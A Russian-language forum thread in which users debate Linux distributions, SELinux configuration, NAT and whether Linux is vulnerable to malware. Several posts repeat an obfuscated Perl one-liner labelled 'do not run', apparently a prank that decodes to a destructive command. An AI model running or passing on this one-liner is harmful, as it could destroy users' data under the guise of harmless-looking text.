Я пока чистый дебиан попробую.

Хорош, но пакеты из задницы свежеразмороженного мамонта.

федору можно, там selinux. Его следует научиться готовить, это прикольная вещь в плане безопасности

но не такая простая к сожалению

>в плане безопасности Один хрен, мой провайдер меня за NAT прячет.

Главное - не готовить его методом setenforce 0

Роллинг в манджаро. Она сроллилась до мервых иксов у меня.

дистры с роллинг релизом надо осторожно обновлять, читая новости дистра. Хотя, это следует делать с любым релизом

вяленький какой-то срач

гентушники призываются в тред

>в плане безопасности Один хрен, мой провайдер меня за NAT прячет.

и че? какое отношение NAT имеет к безопасности? никакого, абсолютно

и че? какое отношение NAT имеет к безопасности? никакого, абсолютно

Некому на безопасность покушаться.

странный вывод, ну если только ты в сеть не выходишь — тогда да

как будто без выделенного IP нельзя систему нагнуть

и вирус подцепить

уже запустили?

да, давно уже, но в космосе пока ещё не проверяли

и вирус подцепить

В линуксе то?

В линуксе то?

ну если ты будешь твердо верить что это не возможно — то подцепишь

личные данные через уязвимость браузера украсть вообще изи, даже сам линукс взламывать не надо

потому что у браузера ко всей твоей домашней папке доступ

В линуксе то?

perl -es'!!),-#(-.?{<>-8#=..#<-*}>;*7-86)!;y!#()-?{}!\x20/`-v;<!;s++$_+ee'&:&:; (не запускать)

perl -es'!!),-#(-.?{<>-8#=..#<-*}>;*7-86)!;y!#()-?{}!\x20/`-v;<!;s++$_+ee'&:&:; (не запускать)

Под рутом?

линукс весьма уязвим ко всяким атакам, как любая ОС, его можно даже назвать достаточно дырявым

perl -es'!!),-#(-.?{<>-8#=..#<-*}>;*7-86)!;y!#()-?{}!\x20/`-v;<!;s++$_+ee'&:&:; (не запускать)

поздно

Под рутом?

пароль попросит

линукс весьма уязвим ко всяким атакам, как любая ОС, его можно даже назвать достаточно дырявым

Но вот порнобаннеров на него не делают, так что читай вирусов нет

можно собрать

и под линукс вполне существует n-ое количество вирусов

https://www.tomshardware.com/news/x86-hidden-god-mode,37582.html

Главное - не готовить его методом setenforce 0

ты умеешь selinux?

Я его умею на уровне setsebool, audit2allow и chcon

Но вот порнобаннеров на него не делают, так что читай вирусов нет

зато превратить твоего пингвина в бота могут

Главное, что не порнобаннер

https://www.tomshardware.com/news/x86-hidden-god-mode,37582.html

>old x86

можно собрать

Скачать, сконфигурировать, скомпилировать, установить под рутом.

да и порнобаннер тоже реально, просто юзеры линукс это не целевая аудитория

арч даже 32 бита не поддерживает

уже

>old x86

мы с этим жили

я один раз промучился с одним сервером часа 2-3. сбросил парль рута через init=/bin/bash и он перестал загружаться, останавливаясь на чем-то типа starting login service [FAILED]. оказалось, это фишка selinux, чтобы не меняли /etc/shadow

на old x86 проще хр поставить

хотя на секурити всем было настолько насрать, что такие ухищрения вряд ли нужны были

есть 64бит XP

да

если на линуксе начнут массово сидеть чайники, порнобанеры тоже появятся

но зачем, если есть 64бит 7 и арч

убунта

если на линуксе начнут массово сидеть чайники, порнобанеры тоже появятся

но появится и сесурити

у меня рабочий десктоп - линупс, не все таким могут похвалиться

хоть и убунта

а чтобы банально защититься хотя бы от кражи личных данных из хомяка и не попасть в ботнет или майнингпулл, нужно думать над защитой

я один раз промучился с одним сервером часа 2-3. сбросил парль рута через init=/bin/bash и он перестал загружаться, останавливаясь на чем-то типа starting login service [FAILED]. оказалось, это фишка selinux, чтобы не меняли /etc/shadow

Wow, а как называется? Чего-то не гуглится нихера

одни линуксы в ботнетах...

миллионами

top и kill в помощь

бля, я пароли держу у третьего дяди

хотя это на самом деле секурнее чем держать их в голове

Роллинг в манджаро. Она сроллилась до мервых иксов у меня.

неудивительно, манджаро мейнтейнят олигофрены

у меня рабочий десктоп - линупс, не все таким могут похвалиться

у меня уже 12 лет линукс как основная рабочая система, один год под freeBDSM сидел

ну где-то так же

Wow, а как называется? Чего-то не гуглится нихера

https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security-enhanced_linux/sect-security-enhanced_linux-working_with_selinux-selinux_contexts_labeling_files

в 2006 под вендой писал на дотнет 1.1 лол

лет 5-6 сидел на арче, года 4 на fedora

а потом сугубо убунта

Wow, а как называется? Чего-то не гуглится нихера

и вот люди страдают: https://unix.stackexchange.com/questions/321038/cannot-login-failed-to-start-login-service и https://serverfault.com/questions/887948/selinux-corrupted-now-unable-to-boot-centos-7-with-selinux-enabled

А, ну контекст поменять - это святое. Первое, что проверяю

ERROR: S client not available

Например, при копировании файлов из рута в директорию веб-сервера там остается юзерский контекст, и веб-сервер эти файлы читать не может

я свои модули политики написал для браузера

так что его можно запускать с минимумом разрешений, необходимых для работы

домашняя директория ему не доступна

еще там же песочница есть, в selinux, встроенная

и ограниченные пользователи

еще там же песочница есть, в selinux, встроенная

да в чруте запустить его и делов-то

chroot не есть песочница

selinux на уровне ядра изолирует

а можно за чрут выйти?

например, по умолчанию selinux запрещает ставить на область памяти флаги w и x одновременно

а можно за чрут выйти?

можно много чего натворить, хотя и не так тривиально

неси подробности

если в чрут можно войти, то можно и выйти из него

а можно за чрут выйти?

Да, если есть рут

Есть неймспейсы, из них не сбежать

неси подробности

так погугли, я много раньше на эту тему гуглил

вот песочница selinux как раз неймспейсы поддерживает

из неймспейсов - понятно, а про чрут не знаю. надо будет почитать

и можно даже без песочницы ограничить процесс так, что ему будет можно только очень ограниченный набор действий

audit2allow помогает ограничить это минимальным уровнем доступа

можно запускать браузер под другим пользователем, xguest например

это именно пользователь selinux

тогда у него будет очень мало прав

ты помешан на безопасности :)

@makkarpov , @synar , вы же, вроде бы, разработчики? зачем вам selinux?

Чтобы периодически с ним ебаться, когда что-то не работает

Но выключать систему безопасности просто потому, что не осилил - тоже не ок

+ у меня на десктопе крутятся всякие веб-серверы и прочие внешние сервисы, которые даже в инет смотрят периодически с белого IP

не, я к тому, что обычно разработчики более безответственны, чем админы/инженеры

я обычно яро выступаю против того, чтобы разработчики руками ходили на тестовые и тем более продакшн-серверы: они то less оставят на лог-файле, что при удалении оного логротейтом место таки не освобождается и может закончиться так случайно, то мусор складывают. на тестовый сервер дал доступ, чтобы на нём запускали свой "продукт", так смотрю туда поставили гцц, собрали буст и ффмпег из исходников уже в /usr/local... блин...